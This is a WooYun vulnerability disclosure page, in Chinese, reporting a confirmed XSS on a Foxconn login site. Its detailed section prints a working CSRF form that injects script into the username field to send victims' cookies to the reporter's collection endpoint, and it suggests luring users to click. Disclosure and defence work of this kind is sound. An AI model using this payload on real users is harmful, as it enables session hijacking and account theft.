富士康某站点XSS，可获取用户cookie | wooyun-2016-0166858| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0166858

漏洞标题：富士康某站点XSS，可获取用户cookie

漏洞作者： lex1993

提交时间：2016-01-04 11:45

修复时间：2016-02-12 18:49

公开时间：2016-02-12 18:49

漏洞类型：XSS 跨站脚本攻击

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-01-04：细节已通知厂商并且等待厂商处理中
2016-01-06：厂商已经确认，细节仅向厂商公开
2016-01-16：细节向核心白帽子及相关领域专家公开
2016-01-26：细节向普通白帽子公开
2016-02-05：细节向实习白帽子公开
2016-02-12：细节向公众公开

简要描述：

富士康某站点存XSS漏洞，配合CSRF攻击可获取用户cookie

详细说明：

存在漏洞站点为http://ser.foxconn.com/，查看其网页源代码，可看到存在以下js：

<script type="text/javascript">
window.onload = function init(){
	if(null != document.getElementById("username")){
		document.getElementById("username").value = '';
		document.getElementById("password").value = '';
	}
	
	playImg(); 
}
function configUser(){
	window.open("ConfigLoginUser.do", "ConfigLoginUser", "width=465,height=500,resizable=no,menubar=no,location=no,scrollbars=no,status=no,titlebar=no,toolbar=bar");
}
function reloadImg(){
	document.getElementById("image").src = 'image.jsp?time=' + new Date().getTime();
}
</script>

此处将用户输入的用户名和密码未经处理直接在代码中使用，存在XSS漏洞，构造CSRF代码如下：

<html>
  <body>
    <form action="http://ser.foxconn.com/Login.do" method="POST" id="form">
      <input type="hidden" name="username" value="admin'</script><script>
	  var img=document.createElement('img');
	  img.src='http://127.0.0.1/test/getcookie.php?cookie='+escape(document.cookie);
	  document.body.appendChild(img);</script><script>'" />
      <input type="hidden" name="validateCode" value="sfsff" />
      <input type="hidden" name="action" value="login" />
      <input type="hidden" name="login" value="登录" />
      <input type="hidden" name="password" value="admin" />
    </form>
	<script> document.getElementById("form").submit();</script>
  </body>
</html>

在用户名字段处插入js代码，构造看不见的图片以获取用户cookie并且传到我的服务器，由于cookie没有添加httponly标记，可直接用js获取，后台获取到cookie

因此只要使用诱惑性文字说明诱骗合法用户点击即可获取用户cookie

漏洞证明：

见详细说明

修复方案：

用户输入进行过滤
cookie添加httponly标记

版权声明：转载请注明来源 lex1993@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2016-01-06 10:00

厂商回复：

感谢提交相关漏洞，已交由相关单位处理

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0166858

漏洞标题：富士康某站点XSS，可获取用户cookie

相关厂商：富士康科技集团

漏洞作者： lex1993

提交时间：2016-01-04 11:45

修复时间：2016-02-12 18:49

公开时间：2016-02-12 18:49

漏洞类型：XSS 跨站脚本攻击

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 lex1993@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0166858

漏洞标题：富士康某站点XSS，可获取用户cookie

相关厂商：富士康科技集团

漏洞作者： lex1993

提交时间：2016-01-04 11:45

修复时间：2016-02-12 18:49

公开时间：2016-02-12 18:49

漏洞类型：XSS 跨站脚本攻击

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0166858"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 lex1993@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：